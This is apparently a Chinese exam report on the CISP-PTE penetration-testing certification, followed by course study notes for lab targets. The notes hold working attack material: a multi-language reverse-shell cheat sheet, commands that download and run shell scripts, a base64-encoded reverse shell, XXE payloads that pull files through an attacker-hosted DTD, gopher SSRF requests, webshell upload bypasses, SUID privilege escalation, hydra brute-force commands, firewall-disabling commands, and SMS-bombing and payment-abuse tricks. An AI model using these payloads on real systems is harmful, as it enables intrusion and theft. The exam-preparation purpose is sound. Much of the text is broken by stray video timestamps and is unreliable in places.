有幸在今年8月份成功通过CISP-PTE认证,以下是我遇到的一些常见问题,以及一些考点内容以及总结
20道选择题 (20分)
5道基础题 (50分) 一题一个Key
1道综合大题 (30分) 三个key
这次考试是在中国上海,现场大概有30人左右,分上午场和下午场
进入考场时候多多少少还是有点紧张的,3个小时过的是非常快的,最后以98分拿下
题目难度是有一点,总的来说的确能学到东西的…
注意:考场内是不允许携带外设键盘的,现场会至少有一个360安全专业人员监考.所有人电脑都会提前装一个奇安信的一个考试exe,刚开始的时候会让你连接一个WIFI,我们将会通过WIFI进行做题,做题期间你的电脑将被全程监控并且一些退出快捷键也是全部锁死(有点像勒索病毒那种界面),想要重启必须直接拔电源。中途可以上厕所,需要监考官陪同
一定要快速上手这个exe,多点点,多翻一下,它整体就类似于一个浏览器里面套了一个虚拟机,就类似于TryHackMe那种浏览器套虚拟机
1.sql注入,有些sql注入并不是让你上传webshell或者注入账密,而是让你利用sql注入读Key
2.AntSword只能连接REQUEST请求和POST请求的一句话木马,并不能连接GET请求的木马
上课环境-pte-100.100-administrator-123.com [
192.1 68.101.134
]
CentOS7-100.150-root [192.1 68.101.150
]
XSS靶机 [192.168.101.141
]
靶机 [192.168.101.140
]
靶机2 [192.168.101.136
]‘
WebShell应急响应靶场 [192.168.101.142
]
pwnlab靶场[192.168.101.143
]
9:50
]25:48
]35:59
]1.前期交互
2.情报收集/信息收集
3.威胁建模
4.漏洞分析
5.漏洞利用/漏洞攻击
6.后渗透(深度利用)
7.书面报告
1:01:19
]1:26:26
]Google_Hacking [``1:40:17-1:58:16``] ————练习
whois [``2:10:11``]
子域名的概念 [``2:18:41``]
收集子域名方法 [``2:26:00``]
Google_Hacking [``2:26:43``] -site 排除xxx域名
搜索引擎DuckDUckgo [``2:30:50``]
子域名爆破:子域名挖掘机 [``2:32:37-2:41:46``] ————练习
2:49:20-2:54:14
] ————练习3:43
]nmap [``5:25-48:40``] ————练习
网站目录结构 [``1:19:40``]
.SVN泄露 .git泄露 网站备份文件压缩文件-test.rar .DS_store文件 WEB-INF文件
配置文件泄露-.config/xx.config.bak/config.php/
robots.txt
1:28:50-1:34:21
] ————练习1:44:49-2:04:13
] ————练习2:34:04
]3:00:08-3:07:31
] ————练习3:22
]11:09-46:11
] ————练习59:10-1:09:54
] ————练习1.内联注释:注释中的语句会被执行 /*!xxx*/
2.# 字符到行尾
3.--空格 到行尾
4./*xxxx*/
1:29:04-1:41:32
] ————练习1:48:17
]1.基于注入点值的属性[``数字型,字符型``][``1:49:15``]
2.基于注入点的位置[``GET型,POST型,Cookie型,HTTP Head型``] [``1:53:21``]
3.基于注入的程度和顺序[``一阶注入,二阶注入``] [``1:57:49-2:12:09``] ————练习
4.基于从服务器返回的响应[``有回显:[``联合查询注入,报错注入,堆叠注入``],无回显:[``布尔盲注,延时盲注``]``] [``1:49:15``]
5.特殊业务场景[``update注入,insert注入,delete注入,order by 注入,宽字节注入,HTTP分割注入,HTTP参数污染``] [``1:49:15``]
5:44-19:30
] ————练习32:00-56:21
] ————练习 1:11:52-1:35:00
] ————练习 1:51:21
]02:05:46-02:31:20
] ————练习02:05:46-02:31:20
] ————练习2:57:29-3:06:37
] ————练习2:03-35:39
] ————练习52:57-1:08:27
] ————练习52:57-1:41:39
] ————练习2:02:28-2:20:24
] ————练习2:21:29-2:42:52
] ————练习 上课环境-pte-100.100-administrator-123.com2:50:52-2:59:13
] ————练习 上课环境-pte-100.100-administrator-123.com4:19-26:55
] ————练习 上课环境-pte-100.100-administrator-123.com37:06-49:49
] ————练习 上课环境-pte-100.100-administrator-123.com58:32-1:17:54
] ————练习 上课环境-pte-100.100-administrator-123.com1:27:40-1:47:27
] ————练习 CentOS7-100.150-root2:06:51-
] windows大小写不敏感,如果是Linux进行大小写绕过,则Php文件可能会被直接下载 ————练习 C:\upload-labs-env 上课环境-pte-100.100-administrator-123.com2:29:27-2:35:33
] ————练习 CentOS7-100.150-root2:47:59-3:02:01
] ————练习 上课环境-pte-100.100-administrator-123.com13:50-30:09
] 上课环境-pte-100.100-administrator-123.com30:09-02:29:54
]1.Vlunhub Tomat靶场日志投毒利用文件包含Getshell(/var/log/auth.log) [``47:59-53:48``] 扩展练习可做可不做
2.phpmyadmin利用session文件包含getshell [``56:10-01:00:05``]
(1).文件包含 pikachu file inclusion - local 上课环境-pte-100.100-administrator-123.com [``练习``]
3.伪协议(重点) [``01:30:21-01:00:05``] ————练习 上课环境-pte-100.100-administrator-123.com
(php伪协议是支持的协议与封装的协议)
1.file:// [``绝对路径读``] //php代码封装好的函数代码实现 [``01:32:12``]
2.php://filter/read=convert.base64-encode/resource=xxx.txt [``相对/绝对路径``] [``01:37:59``]
3.data://text/plain [``allow_url_fopen=on 并且 allow_url_include = on 可以执行任意代码``] [``执行php代码``][``01:52:06``]
(1).file=data://text/plain,
(2).file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
4.php://input [``allow_url_fopen=on 并且 allow_url_include = on``] [``POST传递代码执行``] [``01:57:25``]
47:59-47:43
] 扩展练习可做可不做 5.zip://压缩文件绝对路径#压缩文件内的子文件名 [``php>=5.3.0``] [``读取压缩包内文件内容``] [``02:11:31``]
6.phar://[``压缩包绝对/相对路径``]/[``压缩包内的子文件名``] [``读取压缩包内文件内容``] [``php>=5.3.0``] [``02:16:29``]
02:29:54-02:44:54
]02:22
] ————练习 CentOS7-100.150-root [1083
] [基础题目之文件包含
]有后缀有限制 拼接.html的话
windows 256不处理 ././././././phpinfo.txt
linux 4096 不处理
16:27
] ————练习 CentOS7-100.150-root [83
] [文件包含,有后缀
]23:15
] ————练习 上课环境-pte-100.100-administrator-123.com [http://192.168.101.134/bhmoni/
]==apache==
1. .htaccess [``41:13-01:00:20``]上课环境-pte-100.100-administrator-123.com ————练习 [``upload-lab 4``]
(1).Addtype application/x-httpd-php .jpg
(2).Sethandler application/x-httpd-php
2.apache日志 linux /var/log [``01:09:51``]
3.向前解析漏洞 123.php.a1.a2.a3 [``upload-lab 4``]
4.日志分析 [``01:16:23``] ————练习 上课环境-pte-100.100-administrator-123.com [``http://192.168.101.134/PTE/6.rizhi/``]
curl -o 1.txt http://192.168.101.134/PTE/6.rizhi/rizhi.log
正则表达式:"*.*(hack|back|admin|shell).*\.php.*" 200
5.日志分析 [``01:28:16``] ————练习 CentOS7-100.150-root [``1085``]
172\.16\.12\.12.*"*.*(hack|back|admin|shell).*\.php.*" 200
== IIS解析漏洞 == [``01:56:30``]
(1).目录解析 网站目录下文件夹名字为xx.asp的文件夹,其目录内任何扩展名的文件都会被IIS当作asp文件来解析并执行
(1).文件解析 IIS6.0下,分号后面的不被解析,也就是1.asp;1.jpg 会被服务器看成是1.asp
(3).解析文件类型 .asp .asa .cer .cdx
== Nginx解析漏洞 ==
(1).上传hack.jpg,访问hack.jpg/.php
(2).xxx.jpg%00.php(影响版本[0.5-0.7(<=0.7.65),0.8(<0.8.37)])
1.BURP爆破[``02:09:36-02:26:09``] ————练习 CentOS7-100.150-root [``1085``] http://192.168.101.150:1085/adminlogin.php
2.hydra爆破rdp [``02:37:38-02:44:08``] ————练习 hydra.exe -L u.txt -P p.txt rdp://192.168.101.134 上课环境-pte-100.100-administrator-123.com
02:44:14-03:04:26
]5:01-29:21
] [https://www.mozhe.cnSS/bug/detail/46
]48:51
](1).XSSdemo [``1:01:41``] 上课环境-pte-100.100-administrator-123.com
(2).Pikachu-反射,存储XSS [``1:11:09-1:48:10``] 上课环境-pte-100.100-administrator-123.com
(3).Pikachu-DomXSS [``1:48:19-2:08:48``] 上课环境-pte-100.100-administrator-123.com
(4).XSS盲打 [``2:17:34-``] 上课环境-pte-100.100-administrator-123.com
confirm(123)#弹出带有确认取消的框 prompt(123)#弹出输入框
2:25:34
]#
python2 -m SimpleHTTPServer 监听端口
python3 -m http.server 监听端口 -d 目录
(1).Pikachu-存储型xss窃取cookie [``2:25:39``] ————练习 上课环境-pte-100.100-administrator-123.com
0:59-23:47
] ————练习 XSS靶机192.168.101.14135:20-23:47
] js函数不可以进行大小写转换,/可以替换空格和’,"-(1).Get型CSRF[``DVWA|Pikachu``] [``01:10:10-23:47``] ————练习 上课环境-pte-100.100-administrator-123.com
01:22:22
](1).验证Referer字段
(2).添加Token验证
(3).二次验证
(4).用户养成良好习惯
01:35:30-01:42:04
]02:01:45
](1).反序列化 http://49.234.52.232:84/ http://192.168.101.150:84/————练习 [``02:03:05-02:17:32``]
02:29:47-01:42:04
]01:22:22
]16:25
] 靶机2[192.168.101.136
] system() 主动返回命令结果
passthru() 主动返回命令结果
exec() 主动返回命令结果最后一行数据,如果显示全部数据必须exec($c,$d);var_dump($d);
shell_exec() 不主动返回命令结果.需要echo出结果
命令带入 [``27:09``]
a&b 前面和后面的命令都要执行,无论前面真假
a&&b 如果前面为假,后面的命令不执行,如果前面为真则执行两条命令
a|b 直接执行后面的语句
a||b 如果前面的命令是错的那么执行后面的命令,否则只执行前面的命令
a&b 如果前面的命令错误后面的命令执行,前后都正确命令都执行
a&&b 前面的命令成功后再执行后面的,前面的命令执行不成功后面的也不执行
a|b 前面的命令不管正确与否都执行后面的命令
a||b 表示上一条命令执行失败后,才执行下一条命令,如果上一条命令执行成功后,后面的命令无法执行
%0a 换行符相当于敲完一条命令后换行
; 前面和后面没有影响,哪个正确就执行哪个,都错误就都不执行
57:18
] cat
1:15:59
] ————练习01:36:56-1:44:45
]监听VPS命令
nc -lvvp 7777
被控
bash -i >& /dev/tcp// 0>&1
1:57:35-1:44:45
] ————练习echo \<?php>1
echo Eval\(>>1
echo \$_GET>>1
echo \[``1\``]>>1
echo \)\;>>1
echo \?\>>>1
mv 1 1.php
2:21:41
]php7.0.29前是函数,php7.0.29后是构造器(不支持动态调用)
]/e修正符会将参数当作php代码执行,完成匹配替换后才执行php代码
]$a = create_function('$a','print $a;');
"${phpinfo()}";代码执行phpinfo();
2:38:50
]2:42:21
] 练习 反弹shell攻击者:
echo ‘bash -i >& /dev/tcp/192.168.101.140/10032 0>&1’ > shell.sh
python3 -m http.server 80 -d ./
python2 -m SimpleHTTPServer 80
受害者网址:
system(‘wget -P /tmp http://192.168.101.1/shell.sh’);
system(‘curl -o xxx http://192.168.101.1/shell.sh’);
攻击者:
nc -lvvp 10032
受害者网址:
system(‘bash /tmp/shell.sh’);
发送短信验证码 [``14:48``]
phone=xxx,xxx,xxx多发
刷赞
X-Forwarded-For
Referer
邮箱轰炸
修改Cookie值绕过发送次数限制
大小写绕过邮箱轰炸
29:25
]36:41
]38:06
]38:58
] ————练习 http://192.168.101.140/Sessionsecurity/session47:57
]49:02
]水平越权 [``52:01``] ————练习 http://192.168.101.134/4.0.18/
垂直越权 [``54:07``] ————练习 http://192.168.101.134/fiyo_cms_2.0.6.1/dapur/
1:13:18
]验证码复用 [``一定要卡住再爆破``]
验证码可回显
验证码变种(URL编码,BASE64(尾部有等号),BASE32(0-9+A-Z大写组成),MD5)
万能验证码 888888 000000 666666
验证码暴力破解 纯数字 4-5位左右可以尝试爆破
验证码空
登陆验证绕过 返回包中False修改为True
密码白给 F12
1:35:31
]单价反冲/注册邀请码刷钱 练习 http://192.168.101.134/damicmsv552/ http://192.168.101.134/4.0.18/
金额单位 0.019 只需要支付0.01就可以买
修改支付接口
无限使用优惠券 练习 http://192.168.101.140/niushop/
前端限购商品
无限制试用
越权支付
充值中放弃订单未失效
robots.txt
报错信息
通过对方响应包判断对方中间件类型
备份文件
www.rar
phpinfo.php 搜索disable,open_basedir,DOCUMENT_ROOT,upload_tmp_dir,libxml Version(2.9之前默认开启外部实体引用的)
扫到对方开启了3306的话,手动在url后尝试拼接phpmyadmin
目录列表
目录穿越 /config../../../../../etc/passwd
调试信息
临时文件
页面源代码 考试时候随时查看页面源代码
账户页面
版本控制系统
2:39-37:16
][WebShell应急响应靶场
]netdiscover 扫描内网主机
扫端口!扫目录!一定不能忘!
SUID提权和sudo提权一定要会
.bash_history 历史命令记录
如果页面源代码不是很多的情况下可以尝试View-source: 进行测试,这样即使隐藏在页面的数据也可以看得到,而且速度很快
流程
1.扫端口,扫目录!!数据包修改X-Forwarded-For:127.0.0.1绕过本地验证
2.http://192.168.101.142/?page=register注册任意用户
3.http://192.168.101.142/index.php?page=profile&user_id=381其中id存在水平越权
4.利用水平越权用户账密信息整成字典爆破对方SSH端口
5.hydra -L u.txt -P p.txt ssh://192.168.101.142
6.sudo提权
show GLOBAL VARIABLES like ‘%secure%’;
结果
: 没有安全路径,可以写文件操作
secure_auth OFF
secure_file_priv
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTA0LzgwMDAgIDA+JjE=}|{base64,-d}|{bash,-i}'
1:24:27-1:58:11
][Pwnlab靶场
]流程
1.端口扫描!!,目录扫描!!
2.发现config.php数据库文件,php伪协议读取,连接数据库
3.登录页面 http://192.168.101.143/?page=upload
4.读取upload页面源代码,只能上传图片,利用到文件包含,此时读其他文件index页面源码,发现一个cookie包含点lang
5.上传图片木马
6.利用主页cookie中lang包含木马图片执行反弹shell
?1=system(“/bin/bash%20-c%20’bash%20-i%20>%26%20/dev/tcp/192.168.101.128/10032%200>%261’”);
SUID权限文件收集
靶机
:
find / -user root -perm -4000 -exec ls -ldb {} \;
假设find命令有SUID.
靶机
:
touch 1
find 1 -exec whoami \;
靶机
:
vim 1.php
靶机
:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.128/10032 0>&1'");?>
靶机
:
sudo php 1.php
攻击者
:
nc -lvvp 10032
危害
内网探测
窃取本地和内网敏感数据
攻击服务器本地或内网应用
跳板攻击
绕过安全防御
漏洞协议
http/s
file协议
dict协议
gopher协议
gopher://<host>:<port>/<gopher-pawth>_后接TCP数据流
gopher的默认端口70
发起post请求,回车换行需要使用%0d%0a,如果哦多个参数&也需要URL编码
转换规则:
1.问号(?)需要转码为URL编码%3f
2.回车换行%0d%0a,如果直接用工具转可能只有%0a
3.在HTTP包的最后要加%0d%0a,代表消息结束
get
gopher://192.168.101.140:80/_GET%20/SSRF/get.php%3fname=martin%20HTTP/1.1%0d%0aHost:%20192.168.101.140%0d%0a
post
gopher://192.168.101.1:88/_POST%20/%20HTTP/1.1%0d%0aHost:%20192.168.101.1:88%0d%0aContent-Length:%208%0d%0a%0d%0a1=martin
45:45
]dict://server:ip/命令:参数
向服务器的端口请求为[命令:参数],并在末尾自动补上\r\n(CRLF),也就是只执行一条命令
通过dict协议需要一条条的执行命令,二gopher协议执行一条命令就行
1:36:04
]格式良好的XML文档的基本规则
1:40:04
]DTD(document type definition) 文档类型定义
DTD用来约束xml文档格式,通俗就是语法
#PCDATA 里面会被解析
#CDATA 里面不会被解析
<!ENTITY 实体名 "实体内容">
应用方式:
&实体名;
<!ENTITY %实体名 "实体内容">
应用方式:
%实体名;
<!DOCTYPE 根元素 [元素声明]>
示例
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY name "Martin">
]>
<note>
<name>&name;</name>
<age>19</age>
</note>
示例
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<note>
<name>&name;</name>
</note>
1:58:15-1:59:23
]<!DOCTYPE 根元素 SYSTEM "文件名">
示例1
受害者
:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE code SYSTEM "http://hacker/hack.dtd">
<code>&file;</code>
攻击者http://hacker/hack.dtd
:
<!ENTITY file SYSTEM "file:///etc/passwd">
分割线---------------------------------------------------------------------
示例2
受害者
:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE code [
<!ENTITY % file SYSTEM "http://hacker/hack.dtd">
%file;
]>
<code>&f;</code>
攻击者http://hacker/hack.dtd
:
<!ENTITY f SYSTEM "file:///etc/passwd">
2:02:23
]示例
受害者
:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE code [
<!ENTITY % dtd SYSTEM "http://hacker/hack.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/key.php">
%dtd;
%send;
]>
攻击者http://hacker/hack.dtd
:
<!ENTITY % all "">
%all;
2:07:23
]安装了expect扩展才可以进行RCE
示例
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE code [
<!ENTITY cmd SYSTEM "expect://id">
]>
<code>&cmd;</code>
2:08:43
]2:09:57
]Content-Type application/json改为application/xml
netsh firewall set opmode mode=disable
netsh advfirewall set allprofiles state off
然后更改administrator用户密码
net user administrator mima
在进行反弹webshell时候
一定是用这条
system("/bin/bash+-c+'bash+-i+>%26+/dev/tcp/192.168.101.128/10033+0>%261'");
如果不加/bin/bash -c 就反弹失败
将数据包发送到测试器模块->选项->Grep_Extract选择提取响应值->开始爆破->保存字段user的内容作为字典->保存->结果表->取消保存标题行->勾选包括列当前的正则表达式user->选择目录保存为user.txt
一定要确认题目需不需要图片马,只有解析漏洞才可以利用图片木马
1.首先上传正常图片,获取到图片地址
2.上传一句话木马
文件名:1.php
MIME:image/png
内容添加:GIF89a
3.二次
文件名:1.pHP
MIME:image/png
内容添加:GIF89a
4.三次
文件名:1.php空格
MIME:image/png
内容添加:GIF89a
4-1 特性绕过 1.php.
4-2 特性绕过1.php::$DATA
4-3 双写绕过 利用中间件漏洞,1.php.xxxxxxx.xxxx.xxx.xxx向前解析漏洞
4-4 双写绕过1.pphphp
5.四次
文件名:1.php3 (php4,php5,phtml,phtm)
MIME:image/png
内容添加:GIF89a
6.五次 添加.htaccess
--.htaccess--
第一种:
AddType application/x-httpd-php .png
--所以的png解析成php
第二种:
<FilesMatch "hacker">
SetHandler application/x-httpd-php
</FilesMatch>
--将文件名包含hacker解析成php
7.六次 尝试00截断上传
1.jpg%00.php
或者在路径
/upload/1.php%00
filename=“shell.png”
[在POST请求中需要将%00解码,因为在get请求中会自动帮我们解码]
8.第七次尝试
使用命令将木马拼接到正常图片后
copy normal.png/b + shell.php/a hacker.png
上传图片木马
文件名:1.png
MIME:image/png
内容添加:GIF89a 一句话木马
[打开画图工具可以保存多种格式的图片]
auto_prepend_file=1.jpg
:在文件前插入
auto_append_file=1.jpg
:文件最后插入
我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。
注意!使用file协议读取文件的时候注意格式,三
斜杠
file:///c:/key.php
bash -i >& /dev/tcp/x.x.x.x/port 0>&1
#bash -i 打开一个交互的bash
#>& 将标准错误输出重定向到标准输出
#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
#0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互
exec 0&0 2>&0
0<&196;exec 196<>/dev/tcp/x.x.x.x/4444; sh <&196 >&196 2>&196
/bin/bash -i > /dev/tcp/x.x.x.x/8080 0<&1 2>&1
exec 5<>/dev/tcp/x.x.x.x/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555
//x.x.x.x攻击者IP,监听4444端口的终端中执行命令可以在另一个5555终端中看到命令执行结果
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p
nc -e /bin/bash x.x.x.x port
rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f
nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555
//x.x.x.x攻击者IP,监听4444端口的终端中执行命令可以在另一个5555终端中看到命令执行结果
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
perl -e 'use Socket;$i="x.x.x.x";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
php -r '$sock=fsockopen("x.x.x.x",5555);exec("/bin/bash -i <&3 >&3 2>&3");'
public class Revs {
/**
* @param args
* @throws Exception
*/
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}
如果一台机子nmap扫到22端口80开放
1.极大概率从web服务拿到用户名字典密码字典。进行22端口爆破
2.Hydra 22端口上TOP1000字典爆破
如果一台机子nmap扫到3306端口80开放
1.大概率web服务泄露了config.php,连接数据库,拼接http://127.0.0.1/phpmyadmin
2.Hydra 3306端口上TOP1000字典爆破
21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务,
FTP服务主要是为了在两台计算机之间实现文件的上传与下载,
命令:
hydra -L /root/user.txt -P /root/password.txt ftp://192.168.0.1 -vV
22端口是Linux操作系统 SSH 远程登录协议,
类似于Windows的 3389,
命令:
hydra ssh://192.168.0.1 -L /root/user.txt -P /root/password.txt --vV
1433端口是SQL Server默认的端口,
SQL Server服务使用两个端口:TCP-1433、UDP-1434。
其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。,
命令:
hydra 192.168.0.1 mssql -L /root/user.txt -P /root/password.txt -vV
3306 是MySQL的默认端口,
命令:
hydra 192.168.0.1 mysql -L /root/user.txt -P /root/password.txt -vV
3389 是Windows远程桌面的默认端口,
命令:
hydra 192.168.0.1 rdp -L /root/user.txt -P /root/password.txt -vV
SMB(Server Message Block) 是一种通信协议,
一般使用端口 139,445
命令:
hydra smb://192.168.0.1 -L /root/user.txt -P /root/password.txt -vV
IMAP(Internet Mail Access Protocol,Internet邮件访问协议) ,
使用的端口是 143
命令:
hydra 10.36.16.18 imap PLAIN -L /root/user.txt -P /root/password.txt
zip协议:zip://[绝对路径]
phar协议:phar://[相对/绝对路径]